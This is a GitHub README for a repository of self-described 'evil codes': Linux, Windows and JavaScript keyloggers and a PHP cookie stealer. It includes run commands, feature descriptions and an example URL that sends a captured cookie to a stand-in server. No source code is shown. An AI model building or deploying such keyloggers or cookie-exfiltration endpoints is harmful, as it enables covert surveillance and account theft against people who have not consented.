Skip to content

My personal collection of evil codes in vary languages

License

Notifications You must be signed in to change notification settings

Kode-n-Rolla/evil-codes

Repository files navigation

Disclaimer

These tools are intended for educational and ethical penetration testing only. Unauthorized use of these tools to monitor systems without permission is illegal and unethical.
  • Installation:
    git clone https://github.com/Kode-n-Rolla/evil-codes.git
    cd evil-codes

    Keylogges

    The keyloggers are designed to capture keystrokes and log activity on different operating systems. Please note that these are the first versions and will be refined and enhanced over time. These keyloggers designed for educational and ethical purposes.

    1. Linux Keylogger
      • Description: This keylogger is specifically designed for Linux environments. It listens to keyboard events through the /dev/input devices and logs keystrokes to a file. The keylogger can also detect active processes using xdotool if available
      • Features:
        • Captures and logs keystrokes directly from input devices
        • Supports the mapping of key codes to human-readable characters
        • Writes logs to a file for easy review and analysis
        • Requires root privileges for access to input devices
      • Run the keylogger with root permissions:
        sudo python linux_keylogger.py

    2. Windows Keylogger
      • Description: The Windows version of the keylogger leverages the Windows API and psutil library to capture active window information, process details, and keystrokes. It logs all activities into a file for analysis
      • Features:
        • Captures and logs keystrokes using the Windows API
        • Retrieves active window and process information for detailed logging
        • Supports keyboard layout detection for accurate log representation
        • Outputs logs to a file with detailed information about the active application and layout
      • Run the keylogger:
        python windows_keylogger.py

    3. Java Script Keylogger
      • Description: It logs keypress events, including standard characters, special function keys (e.g., Esc, Enter, Backspace), and modifier keys (Shift, Ctrl, Alt). The keylogger also captures key combinations to provide more comprehensive data. The project showcases JavaScript's event handling capabilities, which could be useful in understanding how keylogging works
      • Features:
        • Logs Regular Keys: Captures standard keyboard characters, including letters, numbers, and symbols
        • Detects Modifier Keys: Recognizes Shift, Ctrl, Alt, and Meta (Windows/Command) keys and includes them in the log
        • Records Special Function Keys: Handles function keys (Esc, Backspace, Delete, Enter, Caps Lock, Tab, and arrow keys)
        • Key Combination Logging: Logs combinations like Ctrl + C, Shift + A, or Alt + Enter
        • Optional Server Communication: Allows sending logged key data to a server endpoint (e.g., for remote analysis)
      • How to use:
        • Place the JavaScript file containing the keylogger code into an HTML file, or link it via a <script> tag

    Cookie Stealer (.php)

  • Description: This project is a simple PHP script that captures and logs cookies sent via URL parameters. The script is intended for educational and ethical purposes, such as security research and demonstration of cookie handling in web applications. It logs any cookie parameter passed through a GET request to a local file named stolen_cookies.txt in the same directory. Each log entry is timestamped for easy reference.
  • Warning: This script should only be used in controlled environments and with permission. Unauthorized use of this tool to capture cookies is illegal and unethical.
  • How It Works:
    1. The script checks for a URL parameter named cookie
    2. If cookie is present, its value is saved to a file stolen_cookies.txt along with the current timestamp
    3. If the parameter is missing, the script simply returns a message saying "No cookie"
  • Example: To log a cookie with a value of example_cookie_value, make a GET request like this:
    http://your-server.com/cookie-stealer.php?cookie=example_cookie_value

    Future Improvements:

    • Security Enhancements: Aim to make the keyloggers more robust and add encryption to protect the captured logs
    • Additional Platforms: Support for macOS and possible improvements to cross-platform functionality
    • Process Tracking: Improvements in tracking processes and window changes in Linux, similar to the Windows version
    • Customization: Providing more customizable settings, such as changing the log file location, log formatting, and more
  • About

    My personal collection of evil codes in vary languages

    Topics

    Resources

    License

    Stars

    Watchers

    Forks

    Releases

    No releases published

    Packages

    No packages published